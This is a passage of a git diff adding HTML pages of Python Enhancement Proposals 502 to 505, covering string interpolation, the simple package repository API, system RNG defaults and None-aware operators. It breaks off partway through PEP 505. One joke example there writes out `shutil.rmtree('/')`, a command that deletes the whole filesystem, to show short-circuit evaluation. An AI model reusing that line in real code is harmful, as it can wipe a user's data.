While also verbose, the string itself is readable. +Though functionality is limited, +it meets its requirements well. +It isn’t powerful enough for many cases, +and that helps keep inexperienced users out of trouble, +as well as avoiding issues with moderately-trusted input (i18n) from +third-parties. +It unfortunately takes enough code to discourage its use for ad-hoc string +interpolation, +unless encapsulated in a convenience library such as flufl.i18n.

+
+
+

PEP 215 - String Interpolation

+

PEP 215 was a former proposal of which this one shares a lot in common. +Apparently, the world was not ready for it at the time, +but considering recent support in a number of other languages, +its day may have come.

+

The large number of dollar sign ($) characters it included may have +led it to resemble Python’s arch-nemesis Perl, +and likely contributed to the PEP’s lack of acceptance. +It was superseded by the following proposal.

+
+
+

str.format() Method

+

The str.format() syntax of PEP 3101 is the most recent and modern of the +existing options. +It is also more powerful and usually easier to read than the others. +It avoids many of the drawbacks and limits of the previous techniques.

+

However, due to its necessary function call and parameter passing, +it runs from verbose to very verbose in various situations with +string literals:

+
>>> 'Hello, user: {user}, id: {id}, on host: {hostname}'.format(**params)
+'Hello, user: nobody, id: 9, on host: darkstar'
+
+# when using keyword args, var name shortening sometimes needed to fit :/
+>>> 'Hello, user: {user}, id: {id}, on host: {host}'.format(user=user,
+                                                            id=id,
+                                                            host=hostname)
+'Hello, user: nobody, id: 9, on host: darkstar'
+
+
+

The verbosity of the method-based approach is illustrated here.

+
+
+

PEP 498 – Literal String Formatting

+

PEP 498 defines and discusses format strings, +as also described in the Abstract above.

+

It also, somewhat controversially to those first exposed, +introduces the idea that format-strings shall be augmented with support for +arbitrary expressions. +This is discussed further in the +Restricting Syntax section under +Rejected Ideas.

+
+
+

PEP 501 – Translation ready string interpolation

+

The complimentary PEP 501 brings internationalization into the discussion as a +first-class concern, with its proposal of the i-prefix, +string.Template syntax integration compatible with ES6 (Javascript), +deferred rendering, +and an object return value.

+
+
+
+

Implementations in Other Languages

+

String interpolation is now well supported by various programming languages +used in multiple industries, +and is converging into a standard of sorts. +It is centered around str.format() style syntax in minor variations, +with the addition of arbitrary expressions to expand utility.

+

In the Motivation section it was shown how convenient interpolation syntax +existed in Bash, Perl, and Ruby. +Let’s take a look at their expression support.

+
+

Bash

+

Bash supports a number of arbitrary, even recursive constructs inside strings:

+
> echo "user: $USER, id: $((id + 6)) on host: $(echo is $(hostname))"
+user: nobody, id: 15 on host: is darkstar
+
+
+
    +
  • Explicit interpolation within double quotes.
  • +
  • Direct environment variable access supported.
  • +
  • Arbitrary expressions are supported. [4]
  • +
  • External process execution and output capture supported. [5]
  • +
  • Recursive expressions are supported.
  • +
+
+
+

Perl

+

Perl also has arbitrary expression constructs, perhaps not as well known:

+
say "I have @{[$id + 6]} guanacos.";                # lists
+say "I have ${\($id + 6)} guanacos.";               # scalars
+say "Hello { @names.join(', ') } how are you?";     # Perl 6 version
+
+
+
    +
  • Explicit interpolation within double quotes.
  • +
  • Arbitrary expressions are supported. [6] [7]
  • +
+
+
+

Ruby

+

Ruby allows arbitrary expressions in its interpolated strings:

+
puts "One plus one is two: #{1 + 1}\n"
+
+
+
    +
  • Explicit interpolation within double quotes.
  • +
  • Arbitrary expressions are supported. [8] [9]
  • +
  • Possible to change delimiter chars with %.
  • +
  • See the Reference Implementation(s) section for an implementation in Python.
  • +
+
+
+

Others

+

Let’s look at some less-similar modern languages recently implementing string +interpolation.

+
+
+

Scala

+

Scala interpolation is directed through string prefixes. +Each prefix has a different result:

+
s"Hello, $name ${1 + 1}"                    # arbitrary
+f"$name%s is $height%2.2f meters tall"      # printf-style
+raw"a\nb"                                   # raw, like r''
+
+
+

These prefixes may also be implemented by the user, +by extending Scala’s StringContext class.

+
    +
  • Explicit interpolation within double quotes with literal prefix.
  • +
  • User implemented prefixes supported.
  • +
  • Arbitrary expressions are supported.
  • +
+
+
+

ES6 (Javascript)

+

Designers of Template strings faced the same issue as Python where single +and double quotes were taken. +Unlike Python however, “backticks” were not. +Despite their issues, +they were chosen as part of the ECMAScript 2015 (ES6) standard:

+
console.log(`Fifteen is ${a + b} and\nnot ${2 * a + b}.`);
+
+
+

Custom prefixes are also supported by implementing a function the same name +as the tag:

+
function tag(strings, ...values) {
+    console.log(strings.raw[0]);    // raw string is also available
+    return "Bazinga!";
+}
+tag`Hello ${ a + b } world ${ a * b}`;
+
+
+
    +
  • Explicit interpolation within backticks.
  • +
  • User implemented prefixes supported.
  • +
  • Arbitrary expressions are supported.
  • +
+
+
+

C#, Version 6

+

C# has a useful new interpolation feature as well, +with some ability to customize interpolation via the IFormattable +interface:

+
$"{person.Name, 20} is {person.Age:D3} year{(p.Age == 1 ? "" : "s")} old.";
+
+
+
    +
  • Explicit interpolation with double quotes and $ prefix.
  • +
  • Custom interpolations are available.
  • +
  • Arbitrary expressions are supported.
  • +
+
+
+

Apple’s Swift

+

Arbitrary interpolation under Swift is available on all strings:

+
let multiplier = 3
+let message = "\(multiplier) times 2.5 is \(Double(multiplier) * 2.5)"
+// message is "3 times 2.5 is 7.5"
+
+
+
    +
  • Implicit interpolation with double quotes.
  • +
  • Arbitrary expressions are supported.
  • +
  • Cannot contain CR/LF.
  • +
+
+
+

Additional examples

+

A number of additional examples of string interpolation may be +found at Wikipedia.

+

Now that background and history have been covered, +let’s continue on for a solution.

+
+
+
+

New Syntax

+

This should be an option of last resort, +as every new syntax feature has a cost in terms of real-estate in a brain it +inhabits. +There is however one alternative left on our list of possibilities, +which follows.

+
+
+

New String Prefix

+

Given the history of string formatting in Python and backwards-compatibility, +implementations in other languages, +avoidance of new syntax unless necessary, +an acceptable design is reached through elimination +rather than unique insight. +Therefore, marking interpolated string literals with a string prefix is chosen.

+

We also choose an expression syntax that reuses and builds on the strongest of +the existing choices, +str.format() to avoid further duplication of functionality:

+
>>> location = 'World'
+>>> f'Hello, {location} !'      # new prefix: f''
+'Hello, World !'                # interpolated result
+
+
+

PEP 498 – Literal String Formatting, delves into the mechanics and +implementation of this design.

+
+
+
+

Additional Topics

+
+

Safety

+

In this section we will describe the safety situation and precautions taken +in support of format-strings.

+
    +
  1. Only string literals have been considered for format-strings, +not variables to be taken as input or passed around, +making external attacks difficult to accomplish.

    str.format() and alternatives already handle this use-case.

    +
  2. +
  3. Neither locals() nor globals() are necessary nor used during the +transformation, +avoiding leakage of information.
  4. +
  5. To eliminate complexity as well as RuntimeError (s) due to recursion +depth, recursive interpolation is not supported.
  6. +
+

However, +mistakes or malicious code could be missed inside string literals. +Though that can be said of code in general, +that these expressions are inside strings means they are a bit more likely +to be obscured.

+
+

Mitigation via Tools

+

The idea is that tools or linters such as pyflakes, pylint, or Pycharm, +may check inside strings with expressions and mark them up appropriately. +As this is a common task with programming languages today, +multi-language tools won’t have to implement this feature solely for Python, +significantly shortening time to implementation.

+

Farther in the future, +strings might also be checked for constructs that exceed the safety policy of +a project.

+
+
+
+

Style Guide/Precautions

+

As arbitrary expressions may accomplish anything a Python expression is +able to, +it is highly recommended to avoid constructs inside format-strings that could +cause side effects.

+

Further guidelines may be written once usage patterns and true problems are +known.

+
+
+

Reference Implementation(s)

+

The say module on PyPI implements string interpolation as described here +with the small burden of a callable interface:

+
> pip install say
+
+from say import say
+nums = list(range(4))
+say("Nums has {len(nums)} items: {nums}")
+
+
+

A Python implementation of Ruby interpolation is also available. +It uses the codecs module to do its work:

+
> pip install interpy
+
+# coding: interpy
+location = 'World'
+print("Hello #{location}.")
+
+
+
+
+

Backwards Compatibility

+

By using existing syntax and avoiding current or historical features, +format strings were designed so as to not interfere with existing code and are +not expected to cause any issues.

+
+
+

Postponed Ideas

+
+

Internationalization

+

Though it was highly desired to integrate internationalization support, +(see PEP 501), +the finer details diverge at almost every point, +making a common solution unlikely: [15]

+
    +
  • Use-cases differ
  • +
  • Compile vs. run-time tasks
  • +
  • Interpolation syntax needs
  • +
  • Intended audience
  • +
  • Security policy
  • +
+
+
+
+

Rejected Ideas

+
+

Restricting Syntax to str.format() Only

+

The common arguments against support of arbitrary expressions were:

+
    +
  1. YAGNI, “You aren’t gonna need it.”
  2. +
  3. The feature is not congruent with historical Python conservatism.
  4. +
  5. Postpone - can implement in a future version if need is demonstrated.
  6. +
+

Support of only str.format() syntax however, +was deemed not enough of a solution to the problem. +Often a simple length or increment of an object, for example, +is desired before printing.

+

It can be seen in the Implementations in Other Languages section that the +developer community at large tends to agree. +String interpolation with arbitrary expressions is becoming an industry +standard in modern languages due to its utility.

+
+
+

Additional/Custom String-Prefixes

+

As seen in the Implementations in Other Languages section, +many modern languages have extensible string prefixes with a common interface. +This could be a way to generalize and reduce lines of code in common +situations. +Examples are found in ES6 (Javascript), Scala, Nim, and C# +(to a lesser extent). +This was rejected by the BDFL. [14]

+
+
+

Automated Escaping of Input Variables

+

While helpful in some cases, +this was thought to create too much uncertainty of when and where string +expressions could be used safely or not. +The concept was also difficult to describe to others. [12]

+

Always consider format string variables to be unescaped, +unless the developer has explicitly escaped them.

+
+
+

Environment Access and Command Substitution

+

For systems programming and shell-script replacements, +it would be useful to handle environment variables and capture output of +commands directly in an expression string. +This was rejected as not important enough, +and looking too much like bash/perl, +which could encourage bad habits. [13]

+
+
+
+
+

Acknowledgements

+
    +
  • Eric V. Smith for the authoring and implementation of PEP 498.
  • +
  • Everyone on the python-ideas mailing list for rejecting the various crazy +ideas that came up, +helping to keep the final design in focus.
  • +
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0502.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0503/index.html b/pep-0503/index.html new file mode 100644 index 00000000000..df2c2dd9965 --- /dev/null +++ b/pep-0503/index.html @@ -0,0 +1,251 @@ + + + + + + + + PEP 503 – Simple Repository API | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 503 – Simple Repository API

+
+
Author:
+
Donald Stufft <donald at stufft.io>
+
BDFL-Delegate:
+
Donald Stufft <donald at stufft.io>
+
Discussions-To:
+
Distutils-SIG list
+
Status:
+
Final
+
Type:
+
Standards Track
+
Topic:
+
Packaging
+
Created:
+
04-Sep-2015
+
Post-History:
+
04-Sep-2015
+
Resolution:
+
Distutils-SIG message
+
+
+
+
Table of Contents +
+
+

Abstract

+

There are many implementations of a Python package repository and many tools +that consume them. Of these, the canonical implementation that defines what +the “simple” repository API looks like is the implementation that powers +PyPI. This document will specify that API, documenting what the correct +behavior for any implementation of the simple repository API.

+
+
+

Specification

+

A repository that implements the simple API is defined by its base URL, this is +the top level URL that all additional URLs are below. The API is named the +“simple” repository due to the fact that PyPI’s base URL is +https://pypi.org/simple/.

+
+

Note

+

All subsequent URLs in this document will be relative to this base +URL (so given PyPI’s URL, a URL of /foo/ would be +https://pypi.org/simple/foo/.

+
+

Within a repository, the root URL (/ for this PEP which represents the base +URL) MUST be a valid HTML5 page with a single anchor element per project in +the repository. The text of the anchor tag MUST be the name of +the project and the href attribute MUST link to the URL for that particular +project. As an example:

+
<!DOCTYPE html>
+<html>
+  <body>
+    <a href="/frob/">frob</a>
+    <a href="/spamspamspam/">spamspamspam</a>
+  </body>
+</html>
+
+
+

Below the root URL is another URL for each individual project contained within +a repository. The format of this URL is /<project>/ where the <project> +is replaced by the normalized name for that project, so a project named +“HolyGrail” would have a URL like /holygrail/. This URL must respond with +a valid HTML5 page with a single anchor element per file for the project. The +href attribute MUST be a URL that links to the location of the file for +download, and the text of the anchor tag MUST match the final path +component (the filename) of the URL. The URL SHOULD include a hash in the +form of a URL fragment with the following syntax: #<hashname>=<hashvalue>, +where <hashname> is the lowercase name of the hash function (such as +sha256) and <hashvalue> is the hex encoded digest.

+

In addition to the above, the following constraints are placed on the API:

+
    +
  • All URLs which respond with an HTML5 page MUST end with a / and the +repository SHOULD redirect the URLs without a / to add a / to the +end.
  • +
  • URLs may be either absolute or relative as long as they point to the correct +location.
  • +
  • There are no constraints on where the files must be hosted relative to the +repository.
  • +
  • There may be any other HTML elements on the API pages as long as the required +anchor elements exist.
  • +
  • Repositories MAY redirect unnormalized URLs to the canonical normalized +URL (e.g. /Foobar/ may redirect to /foobar/), however clients +MUST NOT rely on this redirection and MUST request the normalized +URL.
  • +
  • Repositories SHOULD choose a hash function from one of the ones +guaranteed to be available via the hashlib module in the Python standard +library (currently md5, sha1, sha224, sha256, sha384, +sha512). The current recommendation is to use sha256.
  • +
  • If there is a GPG signature for a particular distribution file it MUST +live alongside that file with the same name with a .asc appended to it. +So if the file /packages/HolyGrail-1.0.tar.gz existed and had an +associated signature, the signature would be located at +/packages/HolyGrail-1.0.tar.gz.asc.
  • +
  • A repository MAY include a data-gpg-sig attribute on a file link with +a value of either true or false to indicate whether or not there is a +GPG signature. Repositories that do this SHOULD include it on every link.
  • +
  • A repository MAY include a data-requires-python attribute on a file +link. This exposes the Requires-Python metadata field, specified in PEP 345, +for the corresponding release. Where this is present, installer tools +SHOULD ignore the download when installing to a Python version that +doesn’t satisfy the requirement. For example:
    <a href="..." data-requires-python="&gt;=3">...</a>
    +
    +
    +

    In the attribute value, < and > have to be HTML encoded as &lt; and +&gt;, respectively.

    +
  • +
+
+

Normalized Names

+

This PEP references the concept of a “normalized” project name. As per PEP 426 +the only valid characters in a name are the ASCII alphabet, ASCII numbers, +., -, and _. The name should be lowercased with all runs of the +characters ., -, or _ replaced with a single - character. This +can be implemented in Python with the re module:

+
import re
+
+def normalize(name):
+    return re.sub(r"[-_.]+", "-", name).lower()
+
+
+
+
+

Changes

+
    +
  • The optional data-requires-python attribute was added in July 2016.
  • +
+
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0503.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0504/index.html b/pep-0504/index.html new file mode 100644 index 00000000000..6d301e6a320 --- /dev/null +++ b/pep-0504/index.html @@ -0,0 +1,515 @@ + + + + + + + + PEP 504 – Using the System RNG by default | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 504 – Using the System RNG by default

+
+
Author:
+
Alyssa Coghlan <ncoghlan at gmail.com>
+
Status:
+
Withdrawn
+
Type:
+
Standards Track
+
Created:
+
15-Sep-2015
+
Python-Version:
+
3.6
+
Post-History:
+
15-Sep-2015
+
+
+
+
Table of Contents +
+
+

Abstract

+

Python currently defaults to using the deterministic Mersenne Twister random +number generator for the module level APIs in the random module, requiring +users to know that when they’re performing “security sensitive” work, they +should instead switch to using the cryptographically secure os.urandom or +random.SystemRandom interfaces or a third party library like +cryptography.

+

Unfortunately, this approach has resulted in a situation where developers that +aren’t aware that they’re doing security sensitive work use the default module +level APIs, and thus expose their users to unnecessary risks.

+

This isn’t an acute problem, but it is a chronic one, and the often long +delays between the introduction of security flaws and their exploitation means +that it is difficult for developers to naturally learn from experience.

+

In order to provide an eventually pervasive solution to the problem, this PEP +proposes that Python switch to using the system random number generator by +default in Python 3.6, and require developers to opt-in to using the +deterministic random number generator process wide either by using a new +random.ensure_repeatable() API, or by explicitly creating their own +random.Random() instance.

+

To minimise the impact on existing code, module level APIs that require +determinism will implicitly switch to the deterministic PRNG.

+
+
+

PEP Withdrawal

+

During discussion of this PEP, Steven D’Aprano proposed the simpler alternative +of offering a standardised secrets module that provides “one obvious way” +to handle security sensitive tasks like generating default passwords and other +tokens.

+

Steven’s proposal has the desired effect of aligning the easy way to generate +such tokens and the right way to generate them, without introducing any +compatibility risks for the existing random module API, so this PEP has +been withdrawn in favour of further work on refining Steven’s proposal as +PEP 506.

+
+
+

Proposal

+

Currently, it is never correct to use the module level functions in the +random module for security sensitive applications. This PEP proposes to +change that admonition in Python 3.6+ to instead be that it is not correct to +use the module level functions in the random module for security sensitive +applications if random.ensure_repeatable() is ever called (directly or +indirectly) in that process.

+

To achieve this, rather than being bound methods of a random.Random +instance as they are today, the module level callables in random would +change to be functions that delegate to the corresponding method of the +existing random._inst module attribute.

+

By default, this attribute will be bound to a random.SystemRandom instance.

+

A new random.ensure_repeatable() API will then rebind the random._inst +attribute to a system.Random instance, restoring the same module level +API behaviour as existed in previous Python versions (aside from the +additional level of indirection):

+
def ensure_repeatable():
+    """Switch to using random.Random() for the module level APIs
+
+    This switches the default RNG instance from the cryptographically
+    secure random.SystemRandom() to the deterministic random.Random(),
+    enabling the seed(), getstate() and setstate() operations. This means
+    a particular random scenario can be replayed later by providing the
+    same seed value or restoring a previously saved state.
+
+    NOTE: Libraries implementing security sensitive operations should
+    always explicitly use random.SystemRandom() or os.urandom in order to
+    correctly handle applications that call this function.
+    """
+    if not isinstance(_inst, Random):
+        _inst = random.Random()
+
+
+

To minimise the impact on existing code, calling any of the following module +level functions will implicitly call random.ensure_repeatable():

+
    +
  • random.seed
  • +
  • random.getstate
  • +
  • random.setstate
  • +
+

There are no changes proposed to the random.Random or +random.SystemRandom class APIs - applications that explicitly instantiate +their own random number generators will be entirely unaffected by this +proposal.

+
+

Warning on implicit opt-in

+

In Python 3.6, implicitly opting in to the use of the deterministic PRNG will +emit a deprecation warning using the following check:

+
if not isinstance(_inst, Random):
+    warnings.warn(DeprecationWarning,
+                  "Implicitly ensuring repeatability. "
+                  "See help(random.ensure_repeatable) for details")
+    ensure_repeatable()
+
+
+

The specific wording of the warning should have a suitable answer added to +Stack Overflow as was done for the custom error message that was added for +missing parentheses in a call to print [10].

+

In the first Python 3 release after Python 2.7 switches to security fix only +mode, the deprecation warning will be upgraded to a RuntimeWarning so it is +visible by default.

+

This PEP does not propose ever removing the ability to ensure the default RNG +used process wide is a deterministic PRNG that will produce the same series of +outputs given a specific seed. That capability is widely used in modelling +and simulation scenarios, and requiring that ensure_repeatable() be called +either directly or indirectly is a sufficient enhancement to address the cases +where the module level random API is used for security sensitive tasks in web +applications without due consideration for the potential security implications +of using a deterministic PRNG.

+
+
+

Performance impact

+

Due to the large performance difference between random.Random and +random.SystemRandom, applications ported to Python 3.6 will encounter a +significant performance regression in cases where:

+
    +
  • the application is using the module level random API
  • +
  • cryptographic quality randomness isn’t needed
  • +
  • the application doesn’t already implicitly opt back in to the deterministic +PRNG by calling random.seed, random.getstate, or random.setstate
  • +
  • the application isn’t updated to explicitly call random.ensure_repeatable
  • +
+

This would be noted in the Porting section of the Python 3.6 What’s New guide, +with the recommendation to include the following code in the __main__ +module of affected applications:

+
if hasattr(random, "ensure_repeatable"):
+    random.ensure_repeatable()
+
+
+

Applications that do need cryptographic quality randomness should be using the +system random number generator regardless of speed considerations, so in those +cases the change proposed in this PEP will fix a previously latent security +defect.

+
+
+

Documentation changes

+

The random module documentation would be updated to move the documentation +of the seed, getstate and setstate interfaces later in the module, +along with the documentation of the new ensure_repeatable function and the +associated security warning.

+

That section of the module documentation would also gain a discussion of the +respective use cases for the deterministic PRNG enabled by +ensure_repeatable (games, modelling & simulation, software testing) and the +system RNG that is used by default (cryptography, security token generation). +This discussion will also recommend the use of third party security libraries +for the latter task.

+
+
+
+

Rationale

+

Writing secure software under deadline and budget pressures is a hard problem. +This is reflected in regular notifications of data breaches involving personally +identifiable information [1], as well as with failures to take +security considerations into account when new systems, like motor vehicles +[2], are connected to the internet. It’s also the case that a lot of +the programming advice readily available on the internet [#search] simply +doesn’t take the mathematical arcana of computer security into account. +Compounding these issues is the fact that defenders have to cover all of +their potential vulnerabilities, as a single mistake can make it possible to +subvert other defences [11].

+

One of the factors that contributes to making this last aspect particularly +difficult is APIs where using them inappropriately creates a silent security +failure - one where the only way to find out that what you’re doing is +incorrect is for someone reviewing your code to say “that’s a potential +security problem”, or for a system you’re responsible for to be compromised +through such an oversight (and you’re not only still responsible for that +system when it is compromised, but your intrusion detection and auditing +mechanisms are good enough for you to be able to figure out after the event +how the compromise took place).

+

This kind of situation is a significant contributor to “security fatigue”, +where developers (often rightly [9]) feel that security engineers +spend all their time saying “don’t do that the easy way, it creates a +security vulnerability”.

+

As the designers of one of the world’s most popular languages [8], +we can help reduce that problem by making the easy way the right way (or at +least the “not wrong” way) in more circumstances, so developers and security +engineers can spend more time worrying about mitigating actually interesting +threats, and less time fighting with default language behaviours.

+
+
+

Discussion

+
+

Why “ensure_repeatable” over “ensure_deterministic”?

+

This is a case where the meaning of a word as specialist jargon conflicts with +the typical meaning of the word, even though it’s technically the same.

+

From a technical perspective, a “deterministic RNG” means that given knowledge +of the algorithm and the current state, you can reliably compute arbitrary +future states.

+

The problem is that “deterministic” on its own doesn’t convey those qualifiers, +so it’s likely to instead be interpreted as “predictable” or “not random” by +folks that are familiar with the conventional meaning, but aren’t familiar with +the additional qualifiers on the technical meaning.

+

A second problem with “deterministic” as a description for the traditional RNG +is that it doesn’t really tell you what you can do with the traditional RNG +that you can’t do with the system one.

+

“ensure_repeatable” aims to address both of those problems, as its common +meaning accurately describes the main reason for preferring the deterministic +PRNG over the system RNG: ensuring you can repeat the same series of outputs +by providing the same seed value, or by restoring a previously saved PRNG state.

+
+
+

Only changing the default for Python 3.6+

+

Some other recent security changes, such as upgrading the capabilities of the +ssl module and switching to properly verifying HTTPS certificates by +default, have been considered critical enough to justify backporting the +change to all currently supported versions of Python.

+

The difference in this case is one of degree - the additional benefits from +rolling out this particular change a couple of years earlier than will +otherwise be the case aren’t sufficient to justify either the additional effort +or the stability risks involved in making such an intrusive change in a +maintenance release.

+
+
+

Keeping the module level functions

+

In additional to general backwards compatibility considerations, Python is +widely used for educational purposes, and we specifically don’t want to +invalidate the wide array of educational material that assumes the availability +of the current random module API. Accordingly, this proposal ensures that +most of the public API can continue to be used not only without modification, +but without generating any new warnings.

+
+
+

Warning when implicitly opting in to the deterministic RNG

+

It’s necessary to implicitly opt in to the deterministic PRNG as Python is +widely used for modelling and simulation purposes where this is the right +thing to do, and in many cases, these software models won’t have a dedicated +maintenance team tasked with ensuring they keep working on the latest versions +of Python.

+

Unfortunately, explicitly calling random.seed with data from os.urandom +is also a mistake that appears in a number of the flawed “how to generate a +security token in Python” guides readily available online.

+

Using first DeprecationWarning, and then eventually a RuntimeWarning, to +advise against implicitly switching to the deterministic PRNG aims to +nudge future users that need a cryptographically secure RNG away from +calling random.seed() and those that genuinely need a deterministic +generator towards explicitly calling random.ensure_repeatable().

+
+
+

Avoiding the introduction of a userspace CSPRNG

+

The original discussion of this proposal on python-ideas[#csprng]_ suggested +introducing a cryptographically secure pseudo-random number generator and using +that by default, rather than defaulting to the relatively slow system random +number generator.

+

The problem [7] with this approach is that it introduces an additional +point of failure in security sensitive situations, for the sake of applications +where the random number generation may not even be on a critical performance +path.

+

Applications that do need cryptographic quality randomness should be using the +system random number generator regardless of speed considerations, so in those +cases.

+
+
+

Isn’t the deterministic PRNG “secure enough”?

+

In a word, “No” - that’s why there’s a warning in the module documentation +that says not to use it for security sensitive purposes. While we’re not +currently aware of any studies of Python’s random number generator specifically, +studies of PHP’s random number generator [3] have demonstrated the ability +to use weaknesses in that subsystem to facilitate a practical attack on +password recovery tokens in popular PHP web applications.

+

However, one of the rules of secure software development is that “attacks only +get better, never worse”, so it may be that by the time Python 3.6 is released +we will actually see a practical attack on Python’s deterministic PRNG publicly +documented.

+
+
+

Security fatigue in the Python ecosystem

+

Over the past few years, the computing industry as a whole has been +making a concerted effort to upgrade the shared network infrastructure we all +depend on to a “secure by default” stance. As one of the most widely used +programming languages for network service development (including the OpenStack +Infrastructure-as-a-Service platform) and for systems administration +on Linux systems in general, a fair share of that burden has fallen on the +Python ecosystem, which is understandably frustrating for Pythonistas using +Python in other contexts where these issues aren’t of as great a concern.

+

This consideration is one of the primary factors driving the substantial +backwards compatibility improvements in this proposal relative to the initial +draft concept posted to python-ideas [6].

+
+
+
+

Acknowledgements

+
    +
  • Theo de Raadt, for making the suggestion to Guido van Rossum that we +seriously consider defaulting to a cryptographically secure random number +generator
  • +
  • Serhiy Storchaka, Terry Reedy, Petr Viktorin, and anyone else in the +python-ideas threads that suggested the approach of transparently switching +to the random.Random implementation when any of the functions that only +make sense for a deterministic RNG are called
  • +
  • Nathaniel Smith for providing the reference on practical attacks against +PHP’s random number generator when used to generate password reset tokens
  • +
  • Donald Stufft for pursuing additional discussions with network security +experts that suggested the introduction of a userspace CSPRNG would mean +additional complexity for insufficient gain relative to just using the +system RNG directly
  • +
  • Paul Moore for eloquently making the case for the current level of security +fatigue in the Python ecosystem
  • +
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0504.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0505/index.html b/pep-0505/index.html new file mode 100644 index 00000000000..9a6f84b9418 --- /dev/null +++ b/pep-0505/index.html @@ -0,0 +1,978 @@ + + + + + + + + PEP 505 – None-aware operators | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 505 – None-aware operators

+
+
Author:
+
Mark E. Haase <mehaase at gmail.com>, Steve Dower <steve.dower at python.org>
+
Status:
+
Deferred
+
Type:
+
Standards Track
+
Created:
+
18-Sep-2015
+
Python-Version:
+
3.8
+
+
+
+
Table of Contents +
+
+

Abstract

+

Several modern programming languages have so-called “null-coalescing” or +“null- aware” operators, including C# [1], Dart [2], Perl, Swift, and PHP +(starting in version 7). There are also stage 3 draft proposals for their +addition to ECMAScript (a.k.a. JavaScript) [3] [4]. These operators provide +syntactic sugar for common patterns involving null references.

+
    +
  • The “null-coalescing” operator is a binary operator that returns its left +operand if it is not null. Otherwise it returns its right operand.
  • +
  • The “null-aware member access” operator accesses an instance member only +if that instance is non-null. Otherwise it returns null. (This is also +called a “safe navigation” operator.)
  • +
  • The “null-aware index access” operator accesses an element of a collection +only if that collection is non-null. Otherwise it returns null. (This +is another type of “safe navigation” operator.)
  • +
+

This PEP proposes three None-aware operators for Python, based on the +definitions and other language’s implementations of those above. Specifically:

+
    +
  • The “None coalescing” binary operator ?? returns the left hand side +if it evaluates to a value that is not None, or else it evaluates and +returns the right hand side. A coalescing ??= augmented assignment +operator is included.
  • +
  • The “None-aware attribute access” operator ?. (“maybe dot”) evaluates +the complete expression if the left hand side evaluates to a value that is +not None
  • +
  • The “None-aware indexing” operator ?[] (“maybe subscript”) evaluates +the complete expression if the left hand site evaluates to a value that is +not None
  • +
+

See the Grammar changes section for specifics and examples of the required +grammar changes.

+

See the Examples section for more realistic examples of code that could be +updated to use the new operators.

+
+
+

Syntax and Semantics

+
+

Specialness of None

+

The None object denotes the lack of a value. For the purposes of these +operators, the lack of a value indicates that the remainder of the expression +also lacks a value and should not be evaluated.

+

A rejected proposal was to treat any value that evaluates as “false” in a +Boolean context as not having a value. However, the purpose of these operators +is to propagate the “lack of value” state, rather than the “false” state.

+

Some argue that this makes None special. We contend that None is +already special, and that using it as both the test and the result of these +operators does not change the existing semantics in any way.

+

See the Rejected Ideas section for discussions on alternate approaches.

+
+
+

Grammar changes

+

The following rules of the Python grammar are updated to read:

+
augassign: ('+=' | '-=' | '*=' | '@=' | '/=' | '%=' | '&=' | '|=' | '^=' |
+            '<<=' | '>>=' | '**=' | '//=' | '??=')
+
+power: coalesce ['**' factor]
+coalesce: atom_expr ['??' factor]
+atom_expr: ['await'] atom trailer*
+trailer: ('(' [arglist] ')' |
+          '[' subscriptlist ']' |
+          '?[' subscriptlist ']' |
+          '.' NAME |
+          '?.' NAME)
+
+
+
+

The coalesce rule

+

The coalesce rule provides the ?? binary operator. Unlike most binary +operators, the right-hand side is not evaluated until the left-hand side is +determined to be None.

+

The ?? operator binds more tightly than other binary operators as most +existing implementations of these do not propagate None values (they will +typically raise TypeError). Expressions that are known to potentially +result in None can be substituted for a default value without needing +additional parentheses.

+

Some examples of how implicit parentheses are placed when evaluating operator +precedence in the presence of the ?? operator:

+
a, b = None, None
+def c(): return None
+def ex(): raise Exception()
+
+(a ?? 2 ** b ?? 3) == a ?? (2 ** (b ?? 3))
+(a * b ?? c // d) == a * (b ?? c) // d
+(a ?? True and b ?? False) == (a ?? True) and (b ?? False)
+(c() ?? c() ?? True) == True
+(True ?? ex()) == True
+(c ?? ex)() == c()
+
+
+

Particularly for cases such as a ?? 2 ** b ?? 3, parenthesizing the +sub-expressions any other way would result in TypeError, as int.__pow__ +cannot be called with None (and the fact that the ?? operator is used +at all implies that a or b may be None). However, as usual, +while parentheses are not required they should be added if it helps improve +readability.

+

An augmented assignment for the ?? operator is also added. Augmented +coalescing assignment only rebinds the name if its current value is None. +If the target name already has a value, the right-hand side is not evaluated. +For example:

+
a = None
+b = ''
+c = 0
+
+a ??= 'value'
+b ??= undefined_name
+c ??= shutil.rmtree('/')    # don't try this at home, kids
+
+assert a == 'value'
+assert b == ''
+assert c == 0 and any(os.scandir('/'))
+
+
+
+
+

The maybe-dot and maybe-subscript operators

+

The maybe-dot and maybe-subscript operators are added as trailers for atoms, +so that they may be used in all the same locations as the regular operators, +including as part of an assignment target (more details below). As the +existing evaluation rules are not directly embedded in the grammar, we specify +the required changes below.

+

Assume that the atom is always successfully evaluated. Each trailer is +then evaluated from left to right, applying its own parameter (either its +arguments, subscripts or attribute name) to produce the value for the next +trailer. Finally, if present, await is applied.

+

For example, await a.b(c).d[e] is currently parsed as +['await', 'a', '.b', '(c)', '.d', '[e]'] and evaluated:

+
_v = a
+_v = _v.b
+_v = _v(c)
+_v = _v.d
+_v = _v[e]
+await _v
+
+
+

When a None-aware operator is present, the left-to-right evaluation may be +short-circuited. For example, await a?.b(c).d?[e] is evaluated:

+
_v = a
